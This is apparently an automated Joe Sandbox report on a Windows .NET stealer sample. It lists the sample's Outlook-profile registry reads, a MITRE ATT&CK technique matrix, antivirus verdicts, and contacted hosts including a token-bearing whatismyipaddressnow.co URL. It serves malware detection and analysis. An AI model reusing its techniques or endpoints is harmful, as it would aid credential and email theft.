            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: C:\Users\user\Desktop\wssvZm9dNK.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
            Source: Yara matchFile source: 00000000.00000002.401019526.00000000023B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wssvZm9dNK.exe PID: 2036, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected PXRECVOWEIWOEI Stealer
            Source: Yara matchFile source: 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: wssvZm9dNK.exe PID: 2036, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts131
            Windows Management Instrumentation            		1
            DLL Side-Loading            		11
            Process Injection            		11
            Disable or Modify Tools            		1
            OS Credential Dumping            		341
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading            		161
            Virtualization/Sandbox Evasion            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol2
            Data from Local System            		1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Process Injection            		Security Account Manager161
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Clipboard Data            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Software Packing            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Timestomp            		LSA Secrets1
            Remote System Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain Credentials1
            System Network Configuration Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync44
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            wssvZm9dNK.exe53%ReversingLabsByteCode-MSIL.Trojan.Zilla
            wssvZm9dNK.exe100%AviraTR/Dropper.MSIL.Gen
            wssvZm9dNK.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.entrust.net/server1.crl00%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            http://ip-api.com0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://secure.comodo.com/CPS00%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
            http://ip-api.com/line/?fields=hosting0%URL Reputationsafe
            https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdf0%Avira URL Cloudsafe
            https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
            https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdfw0%Avira URL Cloudsafe
            http://icanhazip.com/0%Avira URL Cloudsafe
            https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf0%Avira URL Cloudsafe
            https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i0%Avira URL Cloudsafe
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search0%Avira URL Cloudsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
            https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
            https://www.google.com/favicon.ico0%Avira URL Cloudsafe
            https://www.google.com/sorry/index0%Avira URL Cloudsafe
            https://whatismyipaddressnow.co/API/FETCH/getcountry.php0%Avira URL Cloudsafe
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
            https://www.google.com/search?q=net0%Avira URL Cloudsafe
            https://www.google.com/sorry/indextest0%Avira URL Cloudsafe
            http://icanhazip.com0%Avira URL Cloudsafe
            https://www.google.com/search?q=wmf0%Avira URL Cloudsafe
            https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a0%Avira URL Cloudsafe
            http://java.sun.com0%Avira URL Cloudsafe
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%Avira URL Cloudsafe
            https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceidLR0%Avira URL Cloudsafe
            http://whatismyipaddressnow.co0%Avira URL Cloudsafe
            https://www.google.com/search?q=te0%Avira URL Cloudsafe
            https://whatismyipaddressnow.co0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            whatismyipaddressnow.co
            		188.114.96.3
            		truefalse
              		unknown
              ip-api.com
              		208.95.112.1
              		truetrue
                		unknown
                icanhazip.com
                		104.16.185.241
                		truefalse
                  		unknown
                  90.168.9.0.in-addr.arpa
                  		unknown
                  		unknownfalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdffalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://icanhazip.com/false
                    • Avira URL Cloud: safe
                    		unknown
                    https://whatismyipaddressnow.co/API/FETCH/getcountry.phpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ip-api.com/line/?fields=hostingfalse
                    • URL Reputation: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabwssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmftmp8E34.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.entrust.net/server1.crl0wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&itmp8E34.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net03wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=Q2k2HktZAfdfwwssvZm9dNK.exe, 00000000.00000002.401019526.0000000002371000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.diginotar.nl/cps/pkioverheid0wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchwssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/favicon.icotmpEEA8.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ac.ecosia.org/autocomplete?q=wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://java.sun.comwssvZm9dNK.exe, 00000000.00000002.401997905.000000000591F000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/sorry/indexwssvZm9dNK.exe, 00000000.00000002.401019526.0000000002816000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023F9000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003877000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007377000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.000000000340D000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000264C000.00000004.00000800.00020000.00000000.sdmp, tmp3E8D.tmp.dat.0.dr, tmp8E34.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/search?q=wmftmp8E34.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ip-api.comwssvZm9dNK.exe, 00000000.00000002.401019526.000000000261C000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26atmp8E34.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/search?q=nettmp8E34.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/sorry/indextestwssvZm9dNK.exe, 00000000.00000002.401400775.00000000033F8000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401400775.0000000003862000.00000004.00000800.00020000.00000000.sdmp, tmp3E8D.tmp.dat.0.dr, tmp8E34.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://icanhazip.comwssvZm9dNK.exe, 00000000.00000002.401019526.00000000023F9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://ocsp.entrust.net0DwssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewssvZm9dNK.exe, 00000000.00000002.401019526.0000000002371000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://secure.comodo.com/CPS0wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://whatismyipaddressnow.cowssvZm9dNK.exe, 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceidLRwssvZm9dNK.exe, 00000000.00000002.401019526.0000000002816000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://crl.entrust.net/2048ca.crl0wssvZm9dNK.exe, 00000000.00000002.400862104.0000000000652000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=wssvZm9dNK.exe, 00000000.00000002.402200269.0000000007360000.00000004.00000020.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002576000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.000000000276F000.00000004.00000800.00020000.00000000.sdmp, tmpB268.tmp.dat.0.dr, tmpEEA8.tmp.dat.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.com/search?q=tewssvZm9dNK.exe, 00000000.00000002.401019526.0000000002816000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.00000000023F9000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://whatismyipaddressnow.cowssvZm9dNK.exe, 00000000.00000002.401019526.00000000026B6000.00000004.00000800.00020000.00000000.sdmp, wssvZm9dNK.exe, 00000000.00000002.401019526.0000000002371000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    208.95.112.1
                    		ip-api.comUnited States
                    		53334TUT-ASUStrue
                    188.114.97.3
                    		unknownEuropean Union
                    		13335CLOUDFLARENETUSfalse
                    188.114.96.3
                    		whatismyipaddressnow.coEuropean Union
                    		13335CLOUDFLARENETUSfalse
                    104.16.185.241
                    		icanhazip.comUnited States
                    		13335CLOUDFLARENETUSfalse

                    General Information

                    Joe Sandbox version:40.0.0 Tourmaline
                    Analysis ID:1461765
                    Start date and time:2024-06-24 16:49:54 +02:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 4m 50s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:9
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:wssvZm9dNK.exe
                    renamed because original name is a hash value
                    Original Sample Name:2c5697f085b66bec06e28ed6d24ec606.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@10/9@6/4
                    Cookbook Comments:
                    • Found application associated with file extension: .exe

                    Warnings

                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                    • VT rate limit hit for: wssvZm9dNK.exe

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    10:50:45API Interceptor284x Sleep call for process: wssvZm9dNK.exe modified
                    10:50:55API Interceptor7x Sleep call for process: netsh.exe modified
                    10:50:56API Interceptor215x Sleep call for process: msiexec.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    208.95.112.1RobloxCheats.exeGet hashmaliciousUnknownBrowse
                    • ip-api.com/xml/?fields=countryCode,query
                    Applikationsprograms.exeGet hashmaliciousGuLoaderBrowse
                    • ip-api.com/line/?fields=hosting
                    doc20240624-00073.bat.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    FC4311009.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    #U21162.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • ip-api.com/line/?fields=hosting
                    TBN88-19062024=Devrez -Bunker Supply Tende.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    #U00d6deme onaylama.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    QUOTATION_JUNQTRA031244#U00b7PDF.scr.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                    • ip-api.com/line/?fields=hosting
                    Purchase List VIXEN International 90349000 PDF.exeGet hashmaliciousAgentTeslaBrowse
                    • ip-api.com/line/?fields=hosting
                    188.114.97.3QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
                    • filetransfer.io/data-package/khvbX8Pe/download
                    QUOTATION_JUNQTRA031244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
